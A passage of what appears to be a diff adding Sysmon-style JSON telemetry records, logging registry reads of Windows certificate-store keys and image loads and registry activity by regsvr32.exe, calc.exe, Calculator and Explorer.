"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\SysWOW64\\uxtheme.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573244020000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": 
"\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredLaunchWindowingMode", + "registry_value": "PreferredLaunchWindowingMode", + "timestamp": 131883573245580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + 
"registry_value": "WindowSizing", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_value": "WindowSizing", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "registry", + "pid": 2612, + "process_name": "sihost.exe", + "process_path": "c:\\windows\\system32\\sihost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Phone\\ShellUI\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573245730000, + "unique_pid": "{42FC7E13-B2C5-5C05-0000-0010FA880300}" + }, + { + "event_type": "image_load", + "image_name": "MrmCoreR.dll", + "image_path": "C:\\Windows\\System32\\MrmCoreR.dll", + "pid": 4724, + "process_name": "calc.exe", + 
"process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573246200016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": 
"registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883573246509984, + "unique_pid": 
"{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "registry", + "pid": 7276, + "process_name": "Calculator.exe", + "process_path": "C:\\Program Files\\WindowsApps\\Microsoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe\\Calculator.exe", + "registry_key": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState", + "registry_path": "\\REGISTRY\\A\\{7501d5b5-61af-98ea-ad0b-4867d3d594e3}\\LocalState\\Mode", + "registry_value": "Mode", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-C6C3-5C05-0000-00109DB64001}" + }, + { + "event_type": "process", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "subtype": "terminate", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, 
+ "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246509984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "twinui.dll", + "image_path": "C:\\Windows\\System32\\twinui.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + 
"timestamp": 131883573246670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573246670000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573246830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 